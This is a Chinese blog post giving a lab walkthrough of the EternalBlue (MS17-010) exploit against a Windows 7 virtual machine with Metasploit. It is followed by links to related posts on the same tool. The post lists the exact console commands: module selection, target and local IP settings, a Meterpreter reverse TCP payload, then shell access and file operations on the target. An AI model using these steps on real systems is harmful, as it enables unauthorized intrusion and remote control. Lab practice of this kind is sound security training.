MSF渗透测试

已于 2022-05-05 17:30:19 修改
阅读量1.1k 收藏 9
点赞数 1
文章标签: 安全漏洞
于 2021-08-12 21:42:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51646864/article/details/119653231
版权

环境:
靶机:win7(x64)
攻击机:linux2020.2
(在内网中测试)

步骤:
一、在kali终端输入:msfconsole(启动有点久)

二、直接输入指令搜索:search ms17_010
(之前的永恒之蓝)

下一步用下面第二个模块
在这里插入图片描述
三、通过use来使用该模块,所以输入指令 :
use exploit/windows/smb/ms17_010_eternalblue
得到如下,可以看到RHOSTS(目标主机ip)和LHOST (本地ip)两个参数需要配置,其他的默认,目标端口已经默认为445。
在这里插入图片描述
三、现在开始配置RHOSTS、LHOST、payload
输入以下指令配置:
1、set RHOSTS 192.168.0.15
2、set LHOST 192.168.0.14
3、set payload windows/x64/meterpreter/reverse_tcp(这里用的是反向连接,比较常用)

四、配置成功后输入show options查看配置
可以看到下图已经配置成功
在这里插入图片描述
五、接下来就可以run了
输入run回车等待一会
在这里插入图片描述
六、看到下图已经拿到权限。
在这里插入图片描述
最后输入shell登录到目标机,就可以对目标机进行各种操控,例如查看文件,创建文件夹等等。

例如:
输入指令cd C:\进入C盘目录下
输入指令md muma创建名为muma的文件夹
输入指令dir查看C盘文件,下图可以看到已经在目标机C盘里创建了muma文件夹在这里插入图片描述

在这里插入图片描述

遥远之空
关注
Metasploit(MSF)渗透测试入门
2301_77147728的博客
03-29 974
MSF所用功能主要可分为这几个模块,每个模块都有各自的功能领域,形成了渗透测试的流程1、Auxiliary(辅助模块)为渗透测试信息搜集提供了大量的辅助模块支持2、Exploits(攻击模块)利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。3、Payload(攻击载荷模块)攻击成功后促使靶机运行的一段植入代码4、Post (后渗透攻击模块)收集更多信息或进一步访问被利用的目标系统5、Encoders(编码模块)
利用msf渗透测试永恒之蓝漏洞详细教程
hwz_123的博客
03-24 2430
利用msf渗透测试永恒之蓝漏洞详细教程 1、打开kali,利用msf(系统默认已经安装)渗透框架进行攻击测试 2、查找永恒之蓝对应的模块 3、利用辅助模块(auxiliary)进行探测信息(在第二步已经查找出来所有与之相关的模块了) 3、使用攻击模块进行渗透攻击(在第二步已经查找出来所有与之相关的模块了) 3、最后一步,需要配置攻击载荷 4、开始执行run命令即可 ...
msf 渗透测试
06-05
msf渗透
渗透测试工具MSF
2303_77223717的博客
07-08 1209
Metasploit Framework 简称MSF,是一款开源的安全漏洞检测工具。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台,集成数千个漏洞利用、辅助测试模块。
渗透测试方法共有多少种方法?_渗透测试包括哪些
最新发布
weixin_42340783的博客
08-06 1226
按照类型的不同,渗透测试方法可以分为一下6类:1、网络服务2、Web应用程序3、客户端4、无线网5、6、物理渗透测试每种方法的渗透测试都需要特定的知识、方法和工具来执行,并且。网络服务渗透测试是最常见的渗透测试类型之一。该种渗透测试,是在组织的网络基础设施(服务器、防火墙、交换机、路由器、打印机、工作站等)中识别出最暴露的漏洞和安全弱点,然后再被利用。执行的目的是以保护的企业免受常见的基于网络的攻击,包括:• 防火墙错误配置和绕过防火墙• IPS/IDS规避攻击。
msf完整渗透测试
clayzx的博客
11-15 6586
从生成shell到远程连接 前言: 本来是最近打算把时间都花在学c上,渗透目前跟着老师学以后研究,但为了后续上课需求,就必须把这个给拿下了,于是花了今天一天的时间都在研究这个,写一篇详细的实验结果,为了给自己做笔记,也为了刚学msfconsole提供一个资料参考。不说废话了,以下是我们这篇的目标: 1.生成shell 2.上shell 3.监听 4.拿到会话 5.提权 6.拿到密码 7.远程连接 首先此次实验需要准备一台kali的虚拟机和一台windows 7的
网络安全: Kali Linux 使用 MSF 渗透测试
cronaldo91的博客
03-05 2186
(6) 查看Kali Linux (2022.4)系统IP地址。(5)查看Kali Linux (2022.4)系统版本。(2)查看Kali Linux (2024.1)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
msf渗透测试漏洞产生的原因
06-14
Msf(Metasploit Framework)是一个广泛使用的渗透测试工具,它主要用于安全评估和漏洞利用。漏洞产生的原因可以归结为几个方面: 1. 缺乏安全编码实践:开发人员在编写软件时可能没有遵循最佳的安全实践,导致代码...
MSF(Metasploit)渗透测试---黑客工具使用指南
GitHub质检员
11-17 607
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。
渗透测试神器-msf基础
wuli1024的博客
01-11 902
Exploit:msf最核心的模块,里面有针对不同操作系统不同服务的攻击,包括mac和andriodencoders没啥用,编码,自己提供编码倒是可以evasion:免杀,也没啥用,现在免杀也免不了被杀Ms17-010:ms指微软17-010指17年编号010的漏洞。
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
XLbb的博客
05-08 4723
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具。
【网络安全】渗透测试神器-msf基础
2201_75856701的博客
03-09 592
Exploit:msf最核心的模块,里面有针对不同操作系统不同服务的攻击,包括mac和andriodencoders没啥用,编码,自己提供编码倒是可以evasion:免杀,也没啥用,现在免杀也免不了被杀Ms17-010:ms指微软17-010指17年编号010的漏洞。
MSF模拟渗透测试攻击window实例
lza20001103的博客
04-06 4216
一次MSF模拟渗透测试攻击window实例
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
2201_75735270的博客
03-29 3806
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
msf渗透脚本之交换鼠标左右功能
Cosmopolitan的博客
03-07 1203
swap.rb ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Post include Msf::...
MSF渗透测试实战指南:从信息收集到漏洞利用
"MSF渗透测试" MSF(Metasploit Framework)是一个广泛使用的开源渗透测试平台,它为安全研究人员和网络安全专业人员提供了一个全面的环境来发现、开发和利用安全漏洞MSF不仅包含了大量预构建的漏洞利用模块,还...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值